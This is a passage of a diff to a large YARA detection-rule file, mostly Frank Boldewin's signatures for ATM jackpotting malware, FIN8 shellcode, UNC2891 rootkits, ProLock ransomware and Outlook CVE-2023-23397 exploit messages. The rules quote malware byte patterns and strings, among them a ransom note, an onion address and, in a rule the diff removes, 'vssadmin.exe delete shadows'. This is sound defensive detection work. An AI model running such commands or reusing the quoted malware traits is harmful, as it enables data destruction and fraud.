+		id = "94da7da5-5fc3-5221-97d6-1854aa7b1959"
+		date = "2022-03-30"
+		modified = "2023-01-05"
 		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ripper.yar#L1-L22"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "bb7b474330defe6d071b9595687d4510961055fa243a26306698c1e029a935f1"
+		logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99"
 		score = 75
 		quality = 90
-		tags = "ATMRIPPER, MALWARE, FILE"
-		malware_family = "ATM-malware RIPPER"
+		tags = "FILE"
+		hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170"
+		hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5"
+		hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547"
 
 	strings:
-		$Card_Hash1 = "be59a724feae790b3f315edf71a8450888c021f113e3c2b471e174130c201852" nocase ascii
-		$Card_Hash2 = "f26a57da928d6f3e3480dfc7d03761161191bdb170e10ca15c7ac5de6912945c" nocase ascii
-		$Card_Hash3 = "692cdaf6e42ab3a4f307e5d047249f7b30ceddd6bc88f22ca032412419bd62b7" nocase ascii
-		$Card_Hash4 = "0679c7c0c9b0d6919c12cbc087e942d7bf48d3a78cd3ec80321fbfd1b33a1904" nocase ascii
-		$Code_Bytes1 = { 68 CB 00 00 00 50 FF 15 ?? ?? ?? ?? EB 19 }
-		$Code_Bytes2 = { E8 ?? ?? ?? ?? 83 C4 18 6A 02 53 53 FF 15 ?? ?? ?? ?? 68 74 12 43 00 8D 55 A4 }
-		$Service = "DBACKUP SERVICE" nocase wide
+		$pattern1 = {70 61 64 00 6C 63 6B 00}
+		$pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 2 of ( $Card_Hash* ) and all of ( $Code_Bytes* ) and filesize < 400KB and ( $Service in ( 0x2f000 .. 0x30000 ) )
+		uint32( 0 ) == 0x464c457f and all of them
 }
 
 rule R3C0NST_Nighthawk_RAT : FILE
@@ -60661,129 +60462,170 @@ rule R3C0NST_Nighthawk_RAT : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( 3 of ( $pattern* ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) and pe.section_index ( ".detourd" ) ) )
 }
-rule R3C0NST_ATM_Malware_Javadispcash : FILE
+rule R3C0NST_Shellcode_Apihashing_FIN8
 {
 	meta:
-		description = "Detects ATM Malware JavaDispCash"
+		description = "Detects FIN8 Shellcode APIHashing"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "606d1cb6-7879-569e-ac36-1e2f6a446dc1"
-		date = "2019-03-28"
-		modified = "2019-03-28"
-		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Mal.JavaDispCash.yar#L1-L20"
+		id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2"
+		date = "2021-03-16"
+		modified = "2021-03-25"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74"
 		license_url = "N/A"
-		logic_hash = "dd7c2ccc85038f3ba563f7f814c03668448b292fde36bcf9d06bf20fd341526f"
+		logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624"
 		score = 75
-		quality = 74
-		tags = "FILE"
-		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
-		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
+		quality = 90
+		tags = ""
 
 	strings:
-		$CashInfo = "getNumberOfCashUnits" nocase ascii wide
-		$Dispense = "waitforbillstaken" nocase ascii wide
-		$Inject = "No code to inject!" nocase ascii wide
-		$config = ".Agentcli" nocase ascii wide
-		$log1 = "logft.log" nocase ascii wide
-		$log2 = ".loginside" nocase ascii wide
+		$APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E}
+		$APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
+		$APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
+		all of ( $APIHashing32bit* ) or $APIHashing64bit
 }
-rule R3C0NST_ATM_Malware_XFSADM : FILE
+rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE
 {
 	meta:
-		description = "Detects ATM Malware XFSADM"
+		description = "Rule detects Thailand ATM Jackpot malware RIPPER (unpacked)"
+		author = "Frank Boldewin"
+		id = "38dfda5b-45cc-55d4-b619-91fa31c09a09"
+		date = "2016-08-01"
+		modified = "2019-02-27"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ripper.yar#L1-L22"
+		license_url = "N/A"
+		logic_hash = "bb7b474330defe6d071b9595687d4510961055fa243a26306698c1e029a935f1"
+		score = 75
+		quality = 90
+		tags = "ATMRIPPER, MALWARE, FILE"
+		malware_family = "ATM-malware RIPPER"
+
+	strings:
+		$Card_Hash1 = "be59a724feae790b3f315edf71a8450888c021f113e3c2b471e174130c201852" nocase ascii
+		$Card_Hash2 = "f26a57da928d6f3e3480dfc7d03761161191bdb170e10ca15c7ac5de6912945c" nocase ascii
+		$Card_Hash3 = "692cdaf6e42ab3a4f307e5d047249f7b30ceddd6bc88f22ca032412419bd62b7" nocase ascii
+		$Card_Hash4 = "0679c7c0c9b0d6919c12cbc087e942d7bf48d3a78cd3ec80321fbfd1b33a1904" nocase ascii
+		$Code_Bytes1 = { 68 CB 00 00 00 50 FF 15 ?? ?? ?? ?? EB 19 }
+		$Code_Bytes2 = { E8 ?? ?? ?? ?? 83 C4 18 6A 02 53 53 FF 15 ?? ?? ?? ?? 68 74 12 43 00 8D 55 A4 }
+		$Service = "DBACKUP SERVICE" nocase wide
+
+	condition:
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 2 of ( $Card_Hash* ) and all of ( $Code_Bytes* ) and filesize < 400KB and ( $Service in ( 0x2f000 .. 0x30000 ) )
+}
+rule R3C0NST_ATM_Malware_Dispcashbr : FILE
+{
+	meta:
+		description = "Detects ATM Malware DispCashBR"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "57124fef-73a1-5978-b165-b1b7d7c1196e"
-		date = "2019-06-21"
-		modified = "2019-07-11"
-		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24"
+		id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c"
+		date = "2020-02-27"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1232944566208286720"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673"
+		logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d"
 		score = 75
-		quality = 84
+		quality = 90
 		tags = "FILE"
-		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
+		hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
 
 	strings:
-		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
-		$Code2 = {68 98 01 00 00 50 FF 15}
-		$Mutex = "myXFSADM" nocase wide
-		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii
-		$XFSCommand1 = "WfsExecute" nocase ascii
-		$XFSCommand2 = "WfsGetInfo" nocase ascii
-		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii
-		$WindowName = "XFS ADM" nocase wide
-		$FindWindow = "ADM rec" nocase wide
-		$LogFile = "xfs.log" nocase ascii
-		$TmpFile = "~pipe.tmp" nocase ascii
+		$String1 = "(*) Dispensando: %lu" ascii nocase
+		$String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase
+		$String3 = "[+] FOI SACADO:  %lu R$ [+]" ascii nocase
+		$DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase
+		$DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase
+		$Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8}
+		$Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8}
+		$Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 500KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of ( $String* ) and 1 of ( $DbgStr* ) and all of ( $Code* )
 }
-rule R3C0NST_Ransomware_Germanwiper : FILE
+rule R3C0NST_ATM_Malware_XFS_ALICE : FILE
 {
 	meta:
-		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
+		description = "Detects ATM Malware ALICE"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "ea71849e-62a1-5b4d-9cf7-0728192361cc"
-		date = "2019-08-05"
-		modified = "2019-08-05"
-		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Ransomware.Germanwiper.yar#L1-L25"
+		id = "6132730c-4684-517a-b90d-98ed250e2cba"
+		date = "2020-01-09"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1215265889844637696"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "563ad59abd09d9a5fcfcf5ed48dc1e3c48b4bb198c20721d5af531da20d2b0d3"
+		logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
-		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
+		hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30"
 
 	strings:
-		$PurgeCode = {6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8}
-		$Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" nocase ascii
-		$Mutex2 = "cFgxTERNWEVhM2V" nocase ascii
-		$ProcessKill1 = "oracle.exe" nocase ascii
-		$ProcessKill2 = "sqbcoreservice.exe" nocase ascii
-		$ProcessKill3 = "isqlplussvc.exe" nocase ascii
-		$ProcessKill4 = "mysqld.exe" nocase ascii
-		$KillShadowCopies = "vssadmin.exe delete shadows" nocase ascii
-		$Domain1 = "cdnjs.cloudflare.com" nocase ascii
-		$Domain2 = "expandingdelegation.top" nocase ascii
-		$RansomNote = "Entschluesselungs_Anleitung.html" nocase ascii
+		$String1 = "Project Alice" ascii nocase
+		$String2 = "Can't dispense requested amount." ascii nocase
+		$String3 = "Selected cassette is unavailable" ascii nocase
+		$String4 = "ATM update manager" wide nocase
+		$String5 = "Input PIN-code for access" wide nocase
+		$String6 = "Supervisor ID" wide nocase
+		$Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8}
+		$Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8}
+		$Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1000KB and 5 of them
+		uint16( 0 ) == 0x5A4D and filesize < 200KB and 4 of ( $String* ) and all of ( $Code* )
 }
-rule R3C0NST_UNC2891_Slapstick : FILE
+rule R3C0NST_UNC2891_Caketap
 {
 	meta:
-		description = "Detects UNC2891 Slapstick pam backdoor"
+		description = "Detects UNC2891 Rootkit Caketap"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "a731acff-f657-5877-859e-7447230576df"
+		id = "9c2ffe3d-69ca-5f93-bdb1-40e449139dec"
 		date = "2022-03-30"
 		modified = "2023-01-05"
 		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Slapstick.yar#L1-L19"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Caketap.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "7777c3b850f5b7ee326be5461ebc3bf37fb201b67ada78b50575fb31f50adf9a"
+		logic_hash = "530a7d062a218217d2c05460428b2576c3fe2a6099c93940aabde73c513a8914"
+		score = 75
+		quality = 88
+		tags = ""
+
+	strings:
+		$str1 = ".caahGss187" ascii fullword
+		$str2 = "ipstat" ascii
+		$code1 = {41 80 7E 06 4B 75 ?? 41 80 7E 07 57 75 ?? 41 0F B6 46 2B}
+		$code2 = {41 C6 46 01 3D 41 C6 46 08 32}
+
+	condition:
+		uint32( 0 ) == 0x464c457f and ( all of ( $code* ) or ( all of ( $str* ) and #str2 == 2 ) )
+}
+rule R3C0NST_Gamaredon_Getimportbyhash : FILE
+{
+	meta:
+		description = "Detects Gamaredon APIHashing"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "8f28273e-e8ca-52cb-8dbc-a235598b1975"
+		date = "2021-05-12"
+		modified = "2021-05-12"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16"
+		license_url = "N/A"
+		logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
+		hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79"
+		hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8"
+		hash3 = "5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6"
 
 	strings:
-		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
-		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
-		$str1 = "/proc/self/exe" fullword ascii
-		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
-		$str3 = "pam_sm_authenticate" ascii
-		$str4 = "ACCESS GRANTED & WELCOME" xor
+		$ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 }
+		$djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
 rule R3C0NST_UNC2891_Winghook : FILE
 {
@@ -60811,92 +60653,119 @@ rule R3C0NST_UNC2891_Winghook : FILE
 	condition:
 		uint32( 0 ) == 0x464c457f and filesize < 100KB and 1 of ( $code* ) and all of ( $str* )
 }
-rule R3C0NST_ATM_Malware_Xfscashncr : FILE
+rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "Detects ATM Malware XFSCashNCR"
+		description = "Detects Outlook appointments exploiting CVE-2023-23397"
+		author = "Frank Boldewin"
+		id = "7e355e5f-93ca-561d-9a12-f73f1d429e4d"
+		date = "2023-03-19"
+		modified = "2023-03-25"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Exploit_Outlook_CVE_2023_23397.yar#L1-L30"
+		license_url = "N/A"
+		logic_hash = "1847e8223b2f6d3ec5108e15ee46ef031ee1e26d3a5e8ed4a70c77b031f6a5b6"
+		score = 75
+		quality = 86
+		tags = "CVE-2023-23397, FILE"
+		Author = "Frank Boldewin (@r3c0nst)"
+		Hash1 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
+		Hash2 = "a034427fd8524fd62380c881c30b9ab483535974ddd567556692cffc206809d1"
+		Hash3 = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
+		Hash4 = "1543677037fa339877e1d6ef2d077f94613afbcd6434d7181a18df74aca7742b"
+
+	strings:
+		$ipmtask = "IPM.Task" wide ascii
+		$ipmappointment = "IPM.Appointment" wide ascii
+		$ipmtaskb64 = "IPM.Task" base64 base64wide
+		$ipmappointmentb64 = "IPM.Appointment" base64 base64wide
+		$unc_path1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00|3? 00 3? 00|3? 00 3? 00 3? 00) }
+		$unc_path2 = { 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3?|3? 3?|3? 3? 3?) }
+		$unc_a = "\x00\x00\x00\x5c\x5c" base64
+		$unc_w = "\x00\x00\x5c\x00\x5c" base64wide
+		$mail1 = "from:" ascii wide nocase
+		$mail2 = "received:" ascii wide nocase
+
+	condition:
+		(( uint32be( 0 ) == 0xD0CF11E0 or uint32be( 0 ) == 0x789F3E22 ) or ( all of ( $mail* ) ) ) and ( ( $ipmtask or $ipmappointment ) or ( $ipmtaskb64 or $ipmappointmentb64 ) ) and ( ( $unc_path1 or $unc_path2 ) or ( $unc_a or $unc_w ) )
+}
+rule R3C0NST_ATM_Malware_NVISOSPIT : FILE
+{
+	meta:
+		description = "Detects ATM Malware NVISOSPIT"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4"
-		date = "2019-08-28"
-		modified = "2019-08-28"
-		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21"
+		id = "faf9e78e-9d7a-5c9b-a08e-90b895333d5c"
+		date = "2019-05-31"
+		modified = "2019-05-31"
+		reference = "https://twitter.com/r3c0nst/status/1134403094157115392"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.NVISOSPIT.yar#L3-L18"
 		license_url = "N/A"
-		logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a"
+		hash = "d7ce7b152f0da49e96fa32a9336b35253905d9940b001288d0df55d8f8b3951f"
+		logic_hash = "11c1fea74b72a7821ce76a95846a2caff7354e71906496d9530cb44339a49a98"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
 
 	strings:
-		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
-		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
-		$StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
-		$StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
-		$StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
-		$StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
-		$PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
-		$LogFile = "XfsLog.txt" nocase ascii
+		$MalwareName = "NVISOSPIT" ascii fullword
+		$DispenseCommand = "Calling WFSExecute() to dispense $%d" fullword ascii
+		$Code = {C6 85 7D F9 FF FF 4D C6 85 7E F9 FF FF 4D C6 85 7F F9 FF FF 4B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1500KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of them
 }
-rule R3C0NST_ATM_Malware_XFS_ALICE : FILE
+rule R3C0NST_Prolock_Malware : FILE
 {
 	meta:
-		description = "Detects ATM Malware ALICE"
+		description = "Detects Prolock malware in encrypted and decrypted mode"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "6132730c-4684-517a-b90d-98ed250e2cba"
-		date = "2020-01-09"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1215265889844637696"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22"
+		id = "1440b5f5-f1e7-522e-8852-84c326858bb9"
+		date = "2020-05-17"
+		modified = "2020-05-20"
+		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Prolock.Malware.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3"
+		logic_hash = "7502011eba1e36c8ec699f1b627c4980cc3009bb43c5aa5a58571330e93211ea"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30"
+		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
+		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
 
 	strings:
-		$String1 = "Project Alice" ascii nocase
-		$String2 = "Can't dispense requested amount." ascii nocase
-		$String3 = "Selected cassette is unavailable" ascii nocase
-		$String4 = "ATM update manager" wide nocase
-		$String5 = "Input PIN-code for access" wide nocase
-		$String6 = "Supervisor ID" wide nocase
-		$Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8}
-		$Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8}
-		$Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A}
+		$DecryptionRoutine1 = {31 04 1A 81 3C 1A 90 90 90 90 74}
+		$DecryptionRoutine2 = {83 C3 04 81 3C 1A C4 C4 C4 C4 74}
+		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
+		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
+		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
+		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 200KB and 4 of ( $String* ) and all of ( $Code* )
+		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and all of ( $DecryptionRoutine* ) or ( 1 of ( $DecryptedString* ) and $CryptoCode )
 }
-
-rule R3C0NST_ATM_Malware_ATMITCH : FILE
+rule R3C0NST_Aplib_Decompression : FILE
 {
 	meta:
-		description = "Detects ATM Malware ATMItch"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8"
-		date = "2019-03-18"
-		modified = "2019-03-18"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14"
+		description = "Detects aPLib decompression code often used in malware"
+		author = "@r3c0nst"
+		id = "f45c73f5-d316-5fea-a8c4-fd930733415f"
+		date = "2021-03-24"
+		modified = "2021-03-25"
+		reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4"
+		logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4"
 		score = 75
-		quality = 82
+		quality = 90
 		tags = "FILE"
 
 	strings:
-		$STRING1 = "SCREEN and think what does you DO" nocase ascii wide
-		$STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide
-		$STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide
-		$STRING4 = "Catch some money, bitch!" nocase ascii wide
+		$pattern1 = { FC B2 80 31 DB A4 B3 02 }
+		$pattern2 = { AC D1 E8 74 ?? 11 C9 EB }
+		$pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and 1 of them ) or ( pe.imphash ( ) == "655ad5439db0832c5a3f86d0a68ddaac" )
+		filesize < 10MB and all of them
 }
 rule R3C0NST_Stealbit : FILE
 {
@@ -60922,6 +60791,68 @@ rule R3C0NST_Stealbit : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize < 100KB and $C2Decryption
 }
+rule R3C0NST_ATM_Malware_XFSADM : FILE
+{
+	meta:
+		description = "Detects ATM Malware XFSADM"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "57124fef-73a1-5978-b165-b1b7d7c1196e"
+		date = "2019-06-21"
+		modified = "2019-07-11"
+		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24"
+		license_url = "N/A"
+		logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673"
+		score = 75
+		quality = 84
+		tags = "FILE"
+		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
+
+	strings:
+		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
+		$Code2 = {68 98 01 00 00 50 FF 15}
+		$Mutex = "myXFSADM" nocase wide
+		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii
+		$XFSCommand1 = "WfsExecute" nocase ascii
+		$XFSCommand2 = "WfsGetInfo" nocase ascii
+		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii
+		$WindowName = "XFS ADM" nocase wide
+		$FindWindow = "ADM rec" nocase wide
+		$LogFile = "xfs.log" nocase ascii
+		$TmpFile = "~pipe.tmp" nocase ascii
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize < 500KB and 4 of them
+}
+rule R3C0NST_ATM_Malware_Javadispcash : FILE
+{
+	meta:
+		description = "Detects ATM Malware JavaDispCash"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "606d1cb6-7879-569e-ac36-1e2f6a446dc1"
+		date = "2019-03-28"
+		modified = "2019-03-28"
+		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Mal.JavaDispCash.yar#L1-L20"
+		license_url = "N/A"
+		logic_hash = "dd7c2ccc85038f3ba563f7f814c03668448b292fde36bcf9d06bf20fd341526f"
+		score = 75
+		quality = 74
+		tags = "FILE"
+		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
+		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
+
+	strings:
